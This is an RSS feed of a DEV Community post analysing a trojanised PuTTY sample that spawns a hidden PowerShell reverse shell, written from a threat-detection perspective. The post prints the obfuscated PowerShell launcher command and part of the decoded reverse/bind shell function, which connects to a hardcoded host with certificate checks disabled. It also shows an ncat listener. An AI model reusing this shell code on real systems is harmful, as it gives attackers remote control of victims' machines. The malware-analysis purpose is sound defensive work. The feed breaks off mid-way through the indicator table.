<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Vasilis Mantas</title>
    <description>The latest articles on DEV Community by Vasilis Mantas (@vasilis_mantas).</description>
    <link>https://dev.to/vasilis_mantas</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F4102793%2F1a14cc30-128f-4ca5-9934-190e689096b8.png</url>
      <title>DEV Community: Vasilis Mantas</title>
      <link>https://dev.to/vasilis_mantas</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/vasilis_mantas"/>
    <language>en</language>
    <item>
      <title>[Boost]</title>
      <dc:creator>Vasilis Mantas</dc:creator>
      <pubDate>Mon, 31 Aug 2026 15:05:31 +0000</pubDate>
      <link>https://dev.to/vasilis_mantas/-12bp</link>
      <guid>https://dev.to/vasilis_mantas/-12bp</guid>
      <description>&lt;div class="ltag__link--embedded"&gt;
  &lt;div class="crayons-story "&gt;
  &lt;a href="https://dev.to/vasilis_mantas/a-working-putty-with-a-reverse-shell-bolted-on-alp" class="crayons-story__hidden-navigation-link"&gt;A working PuTTY with a reverse shell bolted on&lt;/a&gt;


  &lt;div class="crayons-story__body crayons-story__body-full_post"&gt;
    &lt;div class="crayons-story__top"&gt;
      &lt;div class="crayons-story__meta"&gt;
        &lt;div class="crayons-story__author-pic"&gt;

          &lt;a href="/vasilis_mantas" class="crayons-avatar  crayons-avatar--l  "&gt;
            &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F4102793%2F1a14cc30-128f-4ca5-9934-190e689096b8.png" alt="vasilis_mantas profile" class="crayons-avatar__image" width="800" height="1095"&gt;
          &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
          &lt;div&gt;
            &lt;a href="/vasilis_mantas" class="crayons-story__secondary fw-medium m:hidden"&gt;
              Vasilis Mantas
            &lt;/a&gt;
            &lt;div class="profile-preview-card relative mb-4 s:mb-0 fw-medium hidden m:inline-block"&gt;
              
                Vasilis Mantas
                
                
              
              &lt;div id="story-author-preview-content-4538344" class="profile-preview-card__content crayons-dropdown branded-7 p-4 pt-0"&gt;
                &lt;div class="gap-4 grid"&gt;
                  &lt;div class="-mt-4"&gt;
                    &lt;a href="/vasilis_mantas" class="flex"&gt;
                      &lt;span class="crayons-avatar crayons-avatar--xl mr-2 shrink-0"&gt;
                        &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F4102793%2F1a14cc30-128f-4ca5-9934-190e689096b8.png" class="crayons-avatar__image" alt="" width="800" height="1095"&gt;
                      &lt;/span&gt;
                      &lt;span class="crayons-link crayons-subtitle-2 mt-5"&gt;Vasilis Mantas&lt;/span&gt;
                    &lt;/a&gt;
                  &lt;/div&gt;
                  &lt;div class="print-hidden"&gt;
                    
                      Follow
                    
                  &lt;/div&gt;
                  &lt;div class="author-preview-metadata-container"&gt;&lt;/div&gt;
                &lt;/div&gt;
              &lt;/div&gt;
            &lt;/div&gt;

          &lt;/div&gt;
          &lt;a href="https://dev.to/vasilis_mantas/a-working-putty-with-a-reverse-shell-bolted-on-alp" class="crayons-story__tertiary fs-xs"&gt;&lt;time&gt;Aug 31&lt;/time&gt;&lt;span class="time-ago-indicator-initial-placeholder"&gt;&lt;/span&gt;&lt;/a&gt;
        &lt;/div&gt;
      &lt;/div&gt;

    &lt;/div&gt;

    &lt;div class="crayons-story__indention"&gt;
      &lt;h2 class="crayons-story__title crayons-story__title-full_post"&gt;
        &lt;a href="https://dev.to/vasilis_mantas/a-working-putty-with-a-reverse-shell-bolted-on-alp" id="article-link-4538344"&gt;
          A working PuTTY with a reverse shell bolted on
        &lt;/a&gt;
      &lt;/h2&gt;
        &lt;div class="crayons-story__tags"&gt;
            &lt;a class="crayons-tag  crayons-tag--monochrome " href="/t/malware"&gt;&lt;span class="crayons-tag__prefix"&gt;#&lt;/span&gt;malware&lt;/a&gt;
            &lt;a class="crayons-tag  crayons-tag--monochrome " href="/t/analysis"&gt;&lt;span class="crayons-tag__prefix"&gt;#&lt;/span&gt;analysis&lt;/a&gt;
            &lt;a class="crayons-tag  crayons-tag--monochrome " href="/t/cybersecurity"&gt;&lt;span class="crayons-tag__prefix"&gt;#&lt;/span&gt;cybersecurity&lt;/a&gt;
            &lt;a class="crayons-tag  crayons-tag--monochrome " href="/t/reversing"&gt;&lt;span class="crayons-tag__prefix"&gt;#&lt;/span&gt;reversing&lt;/a&gt;
        &lt;/div&gt;
      &lt;div class="crayons-story__bottom"&gt;
        &lt;div class="crayons-story__details"&gt;
          &lt;a href="https://dev.to/vasilis_mantas/a-working-putty-with-a-reverse-shell-bolted-on-alp" class="crayons-btn crayons-btn--s crayons-btn--ghost crayons-btn--icon-left"&gt;
            &lt;div class="multiple_reactions_aggregate"&gt;
              &lt;span class="multiple_reactions_icons_container"&gt;
                  &lt;span class="crayons_icon_container"&gt;
                    &lt;img src="https://assets.dev.to/assets/exploding-head-daceb38d627e6ae9b730f36a1e390fca556a4289d5a41abb2c35068ad3e2c4b5.svg" width="24" height="24"&gt;
                  &lt;/span&gt;
                  &lt;span class="crayons_icon_container"&gt;
                    &lt;img src="https://assets.dev.to/assets/multi-unicorn-b44d6f8c23cdd00964192bedc38af3e82463978aa611b4365bd33a0f1f4f3e97.svg" width="24" height="24"&gt;
                  &lt;/span&gt;
                  &lt;span class="crayons_icon_container"&gt;
                    &lt;img src="https://assets.dev.to/assets/sparkle-heart-5f9bee3767e18deb1bb725290cb151c25234768a0e9a2bd39370c382d02920cf.svg" width="24" height="24"&gt;
                  &lt;/span&gt;
              &lt;/span&gt;
              &lt;span class="aggregate_reactions_counter"&gt;5&lt;span class="hidden s:inline"&gt;&amp;nbsp;reactions&lt;/span&gt;&lt;/span&gt;
            &lt;/div&gt;
          &lt;/a&gt;
            &lt;a href="https://dev.to/vasilis_mantas/a-working-putty-with-a-reverse-shell-bolted-on-alp#comments" class="crayons-btn crayons-btn--s crayons-btn--ghost crayons-btn--icon-left flex items-center"&gt;
              

              &lt;span class="hidden s:inline"&gt;Add&amp;nbsp;Comment&lt;/span&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div class="crayons-story__save"&gt;
          &lt;small class="crayons-story__tertiary fs-xs mr-2"&gt;
            8 min read
          &lt;/small&gt;
        &lt;/div&gt;
      &lt;/div&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;


</description>
    </item>
    <item>
      <title>A working PuTTY with a reverse shell bolted on</title>
      <dc:creator>Vasilis Mantas</dc:creator>
      <pubDate>Mon, 31 Aug 2026 15:05:16 +0000</pubDate>
      <link>https://dev.to/vasilis_mantas/a-working-putty-with-a-reverse-shell-bolted-on-alp</link>
      <guid>https://dev.to/vasilis_mantas/a-working-putty-with-a-reverse-shell-bolted-on-alp</guid>
      <description>&lt;h2&gt;
  
  
  Why a trojanised utility is harder to catch than a malicious one, and what actually gives it away
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Vasilis Mantas&lt;/strong&gt;, Threat Detection Engineer&lt;/p&gt;




&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Verdict:&lt;/strong&gt; A functioning copy of PuTTY, modified to launch a hidden PowerShell process one second after the SSH client opens. The PowerShell command is base64 encoded and gzip compressed. Decoded, it is a reverse shell that connects over TLS to &lt;code&gt;bonus2.corporatebonusapplication.local&lt;/code&gt; on port 8443. The SSH client works normally throughout, which is the entire point.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The two samples I wrote up previously announced themselves. One deleted itself. The other encrypted the filesystem and put a ransom note on the desktop. This one does neither. It opens PuTTY, you SSH into whatever you were going to SSH into, and nothing appears to be wrong.&lt;/p&gt;

&lt;p&gt;That difference matters more than the technical sophistication, which is honestly not high. The payload here is a fairly standard PowerShell reverse shell of the kind that has been circulating for years. What makes it worth writing about is the delivery: a legitimate tool that still does its job, aimed at people who install SSH clients, which is to say administrators.&lt;/p&gt;

&lt;p&gt;As with the previous write-ups, this sample comes from a training set rather than a live incident.&lt;/p&gt;




&lt;h2&gt;
  
  
  Sample details
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Property&lt;/th&gt;
&lt;th&gt;Value&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;MD5&lt;/td&gt;
&lt;td&gt;&lt;code&gt;334a10500feb0f3444bf2e86ab2e76da&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SHA-256&lt;/td&gt;
&lt;td&gt;&lt;code&gt;0c82e654c09c8fd9fdf4899718efa37670974c9eec5a8fc18a167f93cea6ee83&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Imphash&lt;/td&gt;
&lt;td&gt;&lt;code&gt;19C1DC3E60E2ECFC2C977BCB2019BBEF&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;File size&lt;/td&gt;
&lt;td&gt;1,545,216 bytes (1.47 MB)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Architecture&lt;/td&gt;
&lt;td&gt;32-bit, GUI subsystem&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Compiler timestamp&lt;/td&gt;
&lt;td&gt;10 July 2021, 09:51:55 UTC&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Entropy&lt;/td&gt;
&lt;td&gt;7.394&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;VirusTotal&lt;/td&gt;
&lt;td&gt;50 / 68 vendors flagged at time of analysis&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lab&lt;/td&gt;
&lt;td&gt;FlareVM (detonation), REMnux (network simulation)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Basic static analysis
&lt;/h2&gt;

&lt;p&gt;Hashes first, then VirusTotal. Fifty of sixty-eight engines flagged the file, which settles the question of whether it is worth looking at, though not much else.&lt;/p&gt;

&lt;p&gt;FLOSS produced a lot of output and very little signal. Over 41,000 strings, dominated by ordinary Windows API calls. There was nothing resembling a C2 address, no obvious command line, no encoded blob sitting in the clear. I spent longer on this than I should have before accepting that the interesting part was not going to be in the strings.&lt;/p&gt;

&lt;p&gt;PEStudio was more useful, mostly because of what it did not find.&lt;/p&gt;

&lt;p&gt;The manifest identity reads &lt;code&gt;PuTTY&lt;/code&gt;. The version resource names Simon Tatham. There is a URL pattern pointing to &lt;code&gt;https://www.chiark.greenend.org.uk/~sgtatham/putty/&lt;/code&gt;, which is the genuine PuTTY homepage. Everything about the file's identity says it is PuTTY, and that is because most of it is.&lt;/p&gt;

&lt;p&gt;A few things stood out anyway:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Indicator&lt;/th&gt;
&lt;th&gt;Detail&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Entropy&lt;/td&gt;
&lt;td&gt;7.394, high enough to suggest compressed or packed data somewhere in the file&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Writable and executable section&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Embedded file&lt;/td&gt;
&lt;td&gt;Compiled HTML in &lt;code&gt;.rsrc&lt;/code&gt;, offset &lt;code&gt;0x00121F43&lt;/code&gt;, size 3,255 bytes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Checksum&lt;/td&gt;
&lt;td&gt;Invalid. Expected &lt;code&gt;0x00180BA0&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Blacklisted strings&lt;/td&gt;
&lt;td&gt;160&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Blacklisted functions&lt;/td&gt;
&lt;td&gt;50&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The invalid checksum is the one I would call out to a junior analyst. A legitimately built and signed PuTTY release has a valid PE checksum. This one does not, because somebody modified the binary after it was compiled and did not bother to recalculate it. On its own that proves tampering, not malice, but combined with high entropy in a file this size it is enough to justify detonating.&lt;/p&gt;

&lt;p&gt;At this point the working hypothesis was simply that the file had been altered. I had no idea how yet.&lt;/p&gt;




&lt;h2&gt;
  
  
  Dynamic analysis
&lt;/h2&gt;

&lt;p&gt;The first detonation looked completely uneventful. PuTTY launched, the familiar configuration window appeared, and the application behaved exactly as expected. If I had run it once and moved on, I would have called it clean.&lt;/p&gt;

&lt;p&gt;On the third or fourth run I noticed a blue window flicker into existence and vanish, roughly a second after PuTTY started. It was on screen for a fraction of a second. This is worth dwelling on: the detection here came from running the sample repeatedly and watching the screen, not from any tool. Automated sandboxing would have caught the process creation, but a human clicking through once might not have caught anything at all.&lt;/p&gt;

&lt;p&gt;Procmon confirmed it. Filtering on &lt;code&gt;process name contains putty&lt;/code&gt; gave me PuTTY's PID, and filtering again on &lt;code&gt;ParentPID is &amp;lt;that PID&amp;gt;&lt;/code&gt; showed the child:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;powershell.exe    Process Start    SUCCESS    Parent PID: 8096
powershell.exe    Load Image       C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;PuTTY is an SSH client. It has no legitimate reason to spawn PowerShell, ever. That single parent and child relationship is the whole detection story, and I will come back to it.&lt;/p&gt;

&lt;p&gt;The command line was the payload:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;powershell.exe&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-nop&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-w&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;hidden&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-noni&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-ep&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;bypass&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="s2"&gt;"&amp;amp;([scriptblock]::create((New-Object System.IO.StreamReader(
New-Object System.IO.Compression.GzipStream(
New-Object System.IO.MemoryStream(,&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;Convert&lt;/span&gt;&lt;span class="p"&gt;]::&lt;/span&gt;&lt;span class="n"&gt;FromBase64String&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'H4sIAOW...
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Four flags before anything else happens. No profile, hidden window, no interactive prompt, execution policy bypassed. Each has a plausible individual use. Together, in one command line, they describe something that does not want to be seen or logged in the usual way.&lt;/p&gt;

&lt;p&gt;The structure that follows is base64 wrapped around gzip wrapped around a script block. The nesting is not clever, but it does mean the actual payload never appears as readable text in the process command line, which is where a lot of logging stops looking.&lt;/p&gt;




&lt;h2&gt;
  
  
  Decoding the payload
&lt;/h2&gt;

&lt;p&gt;Copying the base64 blob to REMnux and decoding it:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"H4sIAOW/UWECA51W227jNhB991cMHUtIRbhdbAESLepVsGyD..."&lt;/span&gt; | &lt;span class="nb"&gt;base64&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; out
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The result was a gzip archive, which extracted to a plain text PowerShell script. &lt;code&gt;H4sI&lt;/code&gt; at the start of a base64 string is the gzip magic number and is a reliable tell once you have seen it a few times.&lt;/p&gt;

&lt;p&gt;The script defines a function called &lt;code&gt;powerfun&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="kr"&gt;function&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;powerfun&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="kr"&gt;Param&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;String&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="nv"&gt;$Command&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;String&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="nv"&gt;$Sslcon&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;String&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="nv"&gt;$Download&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="kr"&gt;Process&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nv"&gt;$modules&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;@()&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="kr"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$Command&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;-eq&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"bind"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
            &lt;/span&gt;&lt;span class="nv"&gt;$listener&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;System.Net.Sockets.TcpListener&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="mi"&gt;8443&lt;/span&gt;&lt;span class="w"&gt;
            &lt;/span&gt;&lt;span class="nv"&gt;$listener&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;start&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt;
            &lt;/span&gt;&lt;span class="nv"&gt;$client&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nv"&gt;$listener&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;AcceptTcpClient&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="kr"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$Command&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;-eq&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"reverse"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
            &lt;/span&gt;&lt;span class="nv"&gt;$client&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;New-Object&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;System.Net.Sockets.TCPClient&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="w"&gt;
                &lt;/span&gt;&lt;span class="s2"&gt;"bonus2.corporatebonusapplication.local"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;8443&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nv"&gt;$stream&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nv"&gt;$client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;GetStream&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="kr"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$Sslcon&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;-eq&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"true"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
            &lt;/span&gt;&lt;span class="nv"&gt;$sslStream&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;New-Object&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;System.Net.Security.SslStream&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="w"&gt;
                &lt;/span&gt;&lt;span class="nv"&gt;$stream&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="bp"&gt;$false&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="nv"&gt;$True&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;-as&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;Net.Security.RemoteCertificateValidationCallback&lt;/span&gt;&lt;span class="p"&gt;]))&lt;/span&gt;&lt;span class="w"&gt;
            &lt;/span&gt;&lt;span class="nv"&gt;$sslStream&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;AuthenticateAsClient&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="w"&gt;
                &lt;/span&gt;&lt;span class="s2"&gt;"bonus2.corporatebonusapplication.local"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
            &lt;/span&gt;&lt;span class="nv"&gt;$stream&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nv"&gt;$sslStream&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It supports both directions. In bind mode it listens on 8443 and waits for someone to connect. In reverse mode it dials out to a hardcoded host on the same port. Reverse is the mode that matters in a corporate network, since outbound connections generally succeed where inbound ones do not.&lt;/p&gt;

&lt;p&gt;The certificate validation callback is set to return true unconditionally. The channel is encrypted, but the client will accept any certificate at all, including a self-signed one generated on the attacker's machine that morning. That is a deliberate choice: TLS here is for hiding the traffic from inspection, not for authenticating anything.&lt;/p&gt;

&lt;p&gt;One detail I like about the hostname. &lt;code&gt;bonus2.corporatebonusapplication.local&lt;/code&gt; is not random-looking, and it is not trying to impersonate Microsoft or Google. It sounds like exactly the sort of dull internal application nobody questions. An analyst scanning a proxy log for suspicious domains is looking for something that stands out, and this does not.&lt;/p&gt;




&lt;h2&gt;
  
  
  Confirming the network behaviour
&lt;/h2&gt;

&lt;p&gt;With REMnux running inetsim as a fake DNS resolver, Wireshark showed the DNS query for &lt;code&gt;bonus2.corporatebonusapplication.local&lt;/code&gt;, followed immediately by a TCP connection attempt to port 8443. The connection was reset, since nothing was actually listening.&lt;/p&gt;

&lt;p&gt;To see what the shell would send, I added the hostname to the Windows &lt;code&gt;hosts&lt;/code&gt; file pointing at &lt;code&gt;127.0.0.1&lt;/code&gt; and started a listener:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ncat &lt;span class="nt"&gt;-nvlp&lt;/span&gt; 8443
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The connection came in from &lt;code&gt;127.0.0.1:1052&lt;/code&gt;. The output was mostly unreadable binary, which is expected: this is the raw TLS Client Hello arriving at a plain TCP listener that does not speak TLS. Wireshark confirmed it as &lt;code&gt;TLSv1.2 Client Hello&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;The handshake never completed, because I had no certificate to present. Fragments of readable text did come through, including the hostname and the string &lt;code&gt;whoami&lt;/code&gt;, which suggests the operator side sends an initial command as soon as the session opens.&lt;/p&gt;

&lt;p&gt;I could have gone further here by generating a self-signed certificate and using &lt;code&gt;openssl s_server&lt;/code&gt; or &lt;code&gt;ncat --ssl&lt;/code&gt; to complete the handshake and capture the full session. I did not, and I would do that differently next time. The behaviour was established well enough to write detections against, but seeing the actual command sequence would have been more useful.&lt;/p&gt;




&lt;h2&gt;
  
  
  Indicators of compromise
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Type&lt;/th&gt;
&lt;th&gt;Indicator&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;SHA-256&lt;/td&gt;
&lt;td&gt;&lt;code&gt;0c82e654c09c8fd9fdf4899718efa37670974c9eec5a8fc18a167f93cea6ee83&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MD5&lt;/td&gt;
&lt;td&gt;&lt;code&gt;334a10500feb0f3444bf2e86ab2e76da&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Imphash&lt;/td&gt;
&lt;td&gt;&lt;code&gt;19C1DC3E60E2ECFC2C977BCB2019BBEF&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Domain&lt;/td&gt;
